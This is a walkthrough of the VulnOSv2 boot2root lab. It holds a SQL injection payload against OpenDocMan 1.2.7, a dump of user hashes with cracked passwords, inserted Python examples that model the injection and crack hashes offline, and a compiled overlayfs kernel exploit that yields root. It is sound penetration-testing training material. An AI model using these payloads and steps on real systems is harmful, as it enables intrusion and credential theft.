VulnOSv2

This is another boot2root from my OSCP list hosted by vulnhub.com and TryHackMe.com.
The challenge is as follows: “Your assignment is to pentest a company website, get root of the system and read the final flag”
So let’s get cracking.
Converting
This VM was created in VirtualBox and ships as a .vdi disk image.
I use VMware, and VMware doesn't read .vdi files. So what to do besides installing VirtualBox?
Here is how:
First I install qemu-img, which comes with the qemu-utils package:
root@redteam:~# apt install qemu-utils qemu-block-extra -y
Then I download the VM from vulnhub.com and extract the 7z archive.
root@redteam:~/Downloads# 7z x VulnOSv2.7z

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz (406E3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 799933398 bytes (763 MiB)

Extracting archive: VulnOSv2.7z
--
Path = VulnOSv2.7z
Type = 7z
Physical Size = 799933398
Headers Size = 240
Method = LZMA:25 BCJ
Solid = +
Blocks = 2

Everything is Ok

Folders: 1
Files: 3
Size:       2998942644
Compressed: 799933398
When that is done, run the following command to convert the .vdi file to a .vmdk file:
root@redteam:~/Downloads/VulnOSv2# qemu-img convert -f vdi -O vmdk VulnOSv2.vdi VulnOSv2.vmdk
root@redteam:~/Downloads/VulnOSv2# ls
VulnOSv2.vbox  VulnOSv2.vbox-prev  VulnOSv2.vdi  VulnOSv2.vmdk
And there you have it. Now create a new VM in VMware and replace its hard disk with this .vmdk.
Ok now that this VM runs in VMware I can start.
Recon
Starting with an nmap scan.
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|   256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_  256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open  irc     ngircd
MAC Address: 00:0C:29:83:0D:CE (VMware)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap found the following ports/services:
- OpenSSH 6.6.1p1 on port 22
- Apache httpd 2.4.7 on port 80
- an ngIRCd IRC server on port 6667
Nmap also thinks it runs on Ubuntu, which the SSH version banner confirms.
SSH ~ first try
There are newer versions, but this one doesn't look like it's vulnerable.
root@redteam:~/Downloads/VulnOSv2# ssh 192.168.50.138
The authenticity of host '192.168.50.138 (192.168.50.138)' can't be established.
ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.50.138' (ECDSA) to the list of known hosts.
root@192.168.50.138's password:
Also there is no login banner, which sometimes gives useful information.
HTTP
Browsing to the IP address shows the same information as the description on vulnhub.com.
There is also a link to the main webpage of the company mentioned in the challenge.
At the bottom of the page there is a footer: 2019 © Vulnerable since 1980
That's a nice statement, and it also led me to believe the IRC server is the real culprit here... but first things first.
Also the favicon is that of Drupal. Maybe there is a login page and it's more than just a static site.
On the Documentation page there is a nifty piece of "security".
At first glance there is nothing there... but then, after selecting the text on the page, a hidden note shows up.
Like I said: nifty security. Of course this text is also visible in the page source, but this was more fun to show.
So let’s take a look at /jabcd0cs/
When visiting this page I get a login section and a software name + version: OpenDocMan v1.2.7
root@redteam:~/Downloads/VulnOSv2# searchsploit opendocman 1.2.7
---------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                  |  Path
                                                                | (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
OpenDocMan 1.2.7 - Multiple Vulnerabilities                     | exploits/php/webapps/32075.txt
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
The vulnerabilities are:
- SQL Injection
- Improper Access Control
I try the SQL injection first. The vulnerability is in ajax_udf.php, which doesn't validate the add_value parameter before using it in a query. The payload from the advisory returns the MySQL version:
http://192.168.50.138/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
With Burp I captured the HTTP request so I can feed it to sqlmap later.
GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1
Host: 192.168.50.138
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SpryMedia_DataTables_filetable_out.php=%7B%22iCreate%22%3A1559305767887%2C%22iStart%22%3A0%2C%22iEnd%22%3A6%2C%22iLength%22%3A10%2C%22sFilter%22%3A%22%22%2C%22sFilterEsc%22%3Atrue%2C%22aaSorting%22%3A%5B%20%5B0%2C%22asc%22%5D%5D%2C%22aaSearchCols%22%3A%5B%20%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%5D%2C%22abVisCols%22%3A%5B%20true%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%5D%7D; has_js=1; PHPSESSID=p5okl28r5bjd8o60sleb0n4ds4
Connection: close
Upgrade-Insecure-Requests: 1
The same injection point (user() in place of version()) also tells me which account the application uses to talk to the database: root. In other words, the web application connects to MySQL as the database root user. Note that this is the MySQL account, not the Linux user Apache runs as, but it is still never a good idea: once the application is compromised through SQL injection, the attacker controls every database on the server rather than just the application's own tables.
For now I would like to get the username/password table. For this I use sqlmap, fed with the captured request.
After it ran I had the usernames from the jabcd0cs database:
Database: jabcd0cs
Table: odm_user
[3 entries]
+----------+
| username |
+----------+
| guest    |
| n0w4n    |
| webmin   |
+----------+
The passwords are stored as unsalted MD5 hashes; sqlmap recognised two of them from its dictionary (plaintext shown in brackets).
Database: jabcd0cs
Table: odm_user
[3 entries]
+------------------------------------------+
| password                                 |
+------------------------------------------+
| 084e0343a0486ff05530df6c705c8bb4 (guest) |
| 1a1dc91c907325c69271ddf0c944bc72 (pass)  |
| b78aae356709f8c31118ea613980954b         |
+------------------------------------------+
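To make the add_value injection concrete, here is an added example that is not OpenDocMan's code and not from this write-up. The page shows the payload but not the PHP behind ajax_udf.php, so the model assumes the parameter is spliced into the statement where a table name belongs with nothing after it (the payload needs no comment terminator and matches a nine-column table). It runs against an in-memory SQLite database standing in for MySQL, reproduces both the manual version() leak and the odm_user dump that sqlmap automated, and shows the allow-list fix; the column names and the allow-list are assumptions.

```python
"""Model of the OpenDocMan ajax_udf.php add_value injection (added example)."""
import sqlite3

# Constructed sample rows: the three accounts dumped on the page. The column
# names are an assumption; only the count (nine, matching the payload) matters.
SAMPLE_USERS = [
    (1, "guest",  "084e0343a0486ff05530df6c705c8bb4", 0, "", "", "", "", ""),
    (2, "n0w4n",  "1a1dc91c907325c69271ddf0c944bc72", 0, "", "", "", "", ""),
    (3, "webmin", "b78aae356709f8c31118ea613980954b", 0, "", "", "", "", ""),
]


def build_db() -> sqlite3.Connection:
    """Stand-in for the jabcd0cs MySQL database: SQLite in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE odm_user (id INTEGER PRIMARY KEY, username TEXT,"
        " password TEXT, department INTEGER, phone TEXT, email TEXT,"
        " last_name TEXT, first_name TEXT, pw_reset_code TEXT)"
    )
    conn.executemany("INSERT INTO odm_user VALUES (?,?,?,?,?,?,?,?,?)", SAMPLE_USERS)
    return conn


def engine_version() -> str:
    """What version() reports on the real target, for SQLite here."""
    return sqlite3.sqlite_version


def vulnerable_lookup(conn: sqlite3.Connection, add_value: str) -> list:
    # VULNERABLE (models ajax_udf.php): request input lands in the identifier
    # position. A bound parameter cannot hold a table name, so concatenation
    # here hands the attacker the remainder of the statement.
    return conn.execute(f"SELECT * FROM {add_value}").fetchall()


# The page's payload, with MySQL's version() swapped for SQLite's equivalent.
VERSION_PAYLOAD = "odm_user UNION SELECT 1,sqlite_version(),3,4,5,6,7,8,9"

# The same trick doing what sqlmap automated: pull every username:hash pair.
# 'WHERE 0' suppresses the legitimate rows so only injected data comes back,
# the way a page that renders a single field would show it.
DUMP_PAYLOAD = (
    "odm_user WHERE 0 UNION SELECT 1,username||':'||password,"
    "3,4,5,6,7,8,9 FROM odm_user"
)


def leaked_column(conn: sqlite3.Connection, payload: str, column: int = 1) -> list:
    """Values of one result column after injecting `payload` into add_value."""
    return [row[column] for row in vulnerable_lookup(conn, payload)]


def dump_credentials(conn: sqlite3.Connection) -> dict:
    """username -> password hash, recovered purely through the injection."""
    return dict(pair.split(":", 1) for pair in leaked_column(conn, DUMP_PAYLOAD))


ALLOWED_TABLES = frozenset({"odm_user"})  # assumed allow-list of identifiers


def hardened_lookup(conn: sqlite3.Connection, add_value: str) -> list:
    # FIXED: identifiers cannot be parameterised, so validate the name against
    # an allow-list and quote it. Letting the client choose the table at all
    # is rarely a real requirement; a fixed table name would be better still.
    if add_value not in ALLOWED_TABLES:
        raise ValueError(f"rejected table name: {add_value!r}")
    return conn.execute(f'SELECT * FROM "{add_value}"').fetchall()


if __name__ == "__main__":
    db = build_db()
    print("leaked:", [v for v in leaked_column(db, VERSION_PAYLOAD) if v == engine_version()])
    for user, digest in dump_credentials(db).items():
        print(f"{user}:{digest}")
    try:
        hardened_lookup(db, VERSION_PAYLOAD)
    except ValueError as err:
        print("hardened lookup refused the payload:", err)
```

The point of the hardened version is that escaping does not help in an identifier position; the only sound fix is to refuse anything that is not a known table name.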
There is a nice Python script on GitHub, Hash-Buster, that can help when you're stuck with a hash: it identifies the hash type and looks it up in online hash databases.
root@redteam:~/Hash-Buster# python3 hash.py -s b78aae356709f8c31118ea613980954b

 _  _ ____ ____ _  _    ___  _  _ ____ ___ ____ ____
 |__| |__| [__  |__|    |__] |  | [__   |  |___ |__/
 |  | |  | ___] |  |    |__] |__| ___]  |  |___ |  \ v3.0

[!] Hash function : MD5
webmin1980
And there is the joke from the footer found earlier: "vulnerable since 1980".
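An online lookup works because the hashes are unsalted MD5, but the same result is reachable offline with a wordlist built from recon, which matters on an engagement where you must not ship client hashes to third-party services. The following is an added example, not Hash-Buster and not code from this write-up: it guesses the hash type from its shape, builds candidates by combining the dumped usernames with tokens lifted from the target (the "1980" from the footer) and a few constructed common words, and cracks all three hashes from the odm_user dump.

```python
"""Offline identification and dictionary cracking of the odm_user hashes (added example)."""
import hashlib
import re

# The three hashes dumped from odm_user on the page, used here as test data.
DUMPED_HASHES = {
    "guest":  "084e0343a0486ff05530df6c705c8bb4",
    "n0w4n":  "1a1dc91c907325c69271ddf0c944bc72",
    "webmin": "b78aae356709f8c31118ea613980954b",
}

# Constructed recon input: tokens seen on the target site and a tiny base list.
SITE_TOKENS = ["1980", "jabc"]
BASE_WORDS = ["password", "pass", "admin"]


def identify_hash(digest: str) -> str:
    """Best-effort guess from length and alphabet. 32 hex chars is MD5 for
    OpenDocMan, but the same shape could be MD4 or NTLM elsewhere, so treat
    the answer as a first thing to try rather than a fact."""
    if re.fullmatch(r"[0-9a-f]{32}", digest):
        return "md5"
    if re.fullmatch(r"[0-9a-f]{40}", digest):
        return "sha1"
    if re.fullmatch(r"[0-9a-f]{64}", digest):
        return "sha256"
    return "unknown"


def build_candidates(usernames, tokens, base_words) -> list:
    """Wordlist from recon: usernames and common words on their own, plus each
    combined with tokens taken from the target (username+year is a classic)."""
    cands = set(usernames) | set(base_words) | set(tokens)
    for word in list(usernames) + list(base_words):
        for tok in tokens:
            cands.update({word + tok, tok + word, f"{word}_{tok}", f"{word}{tok}!"})
    return sorted(cands)


def crack(hashes: dict, candidates) -> dict:
    """Return username -> plaintext for every hash some candidate reproduces.
    Because the hashes are unsalted, one digest per candidate is compared
    against all targets of that algorithm at once."""
    wanted_by_alg = {}
    for user, digest in hashes.items():
        alg = identify_hash(digest)
        if alg != "unknown":
            wanted_by_alg.setdefault(alg, {})[digest] = user
    found = {}
    for alg, wanted in wanted_by_alg.items():
        for word in candidates:
            digest = hashlib.new(alg, word.encode()).hexdigest()
            if digest in wanted:
                found[wanted[digest]] = word
    return found


if __name__ == "__main__":
    words = build_candidates(DUMPED_HASHES.keys(), SITE_TOKENS, BASE_WORDS)
    for user, plain in crack(DUMPED_HASHES, words).items():
        print(f"{user}: {plain}")
```

The candidate generator is deliberately small; on a real engagement you would feed the same usernames and site tokens into hashcat's rule engine instead, but the lesson is identical: unsalted MD5 of a username plus a year from the company's own website falls in milliseconds.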
SSH ~ second try
root@redteam:~# ssh webmin@192.168.50.138
webmin@192.168.50.138's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri May 31 15:33:28 CEST 2019

  System load: 0.0              Memory usage: 4%   Processes:       65
  Usage of /:  5.7% of 29.91GB  Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May  4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
Now for some system recon.
$ python -c 'import pty;pty.spawn("/bin/bash");'
webmin@VulnOSv2:~$ pwd
/home/webmin
webmin@VulnOSv2:~$ ls -lah
total 596K
drwxr-x--- 3 webmin webmin 4.0K May  3  2016 .
drwxr-xr-x 4 root   root   4.0K Apr 16  2016 ..
-rw------- 1 webmin webmin   85 May  4  2016 .bash_history
-rw-r--r-- 1 webmin webmin  220 Apr  9  2014 .bash_logout
-rw-r--r-- 1 webmin webmin 3.6K Apr  9  2014 .bashrc
drwx------ 2 webmin webmin 4.0K Apr 30  2016 .cache
-rw-rw-r-- 1 webmin webmin 566K Apr 30  2016 post.tar.gz
-rw-r--r-- 1 webmin webmin  675 Apr  9  2014 .profile
In the user's home folder there is a tarball. To get it onto my system I start a Python HTTP server on the target (Python is installed there)
and fetch the file with curl, piping it straight into tar to extract the contents.
It looks like the files needed to build hydra. Not very useful at the moment.
For a faster survey of the system I use the recon bash script LinEnum.
webmin@VulnOSv2:~$ uname -r
3.13.0-24-generic
webmin@VulnOSv2:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"
NAME="Ubuntu"
VERSION="14.04.4 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.4 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
Looks like an old kernel, which probably has some vulnerabilities.
root@redteam:~# searchsploit kernel 3.13
--------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                 |  Path
                                                               | (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Deni | exploits/osx/dos/8264.c
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory  | exploits/osx/dos/8263.c
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overf | exploits/osx/dos/8262.c
Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial | exploits/multiple/dos/5191.c
Linux Kernel 3.13 - SGID Privilege Escalation                  | exploits/linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) -  | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) -  | exploits/linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (M | exploits/linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local | exploits/linux/dos/36743.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X | exploits/linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Ar | exploits/linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)          | exploits/linux/dos/31305.c
--------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Because the kernel is 3.13.0-24 and the OS is Ubuntu 14.04, there is a good chance the overlayfs exploit (37292.c, CVE-2015-1328) applies.
To exploit it I copy 37292.c to the target as kernel.c and compile it there: gcc is installed on the box, and since it is a 32-bit i686 system, building locally avoids any cross-compilation trouble.
webmin@VulnOSv2:/tmp$ gcc kernel.c -o kernel
webmin@VulnOSv2:/tmp$ ls -lah
total 28K
drwxrwxrwx  2 root   root   4.0K May 31 15:41 .
drwxr-xr-x 21 root   root   4.0K Apr  3  2016 ..
-rwxrwxr-x  1 webmin webmin  12K May 31 15:41 kernel
-rw-rw-r--  1 webmin webmin 5.0K May 31 15:38 kernel.c
webmin@VulnOSv2:/tmp$ ./kernel
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
After compiling and running the program my privileges are escalated to root. Now for the flag.
# cd /root
# ls
flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
Conclusion
This was a fun challenge to try.
I don't have any more challenges from the VulnOS series on my list, but I think I'll definitely give another one a shot.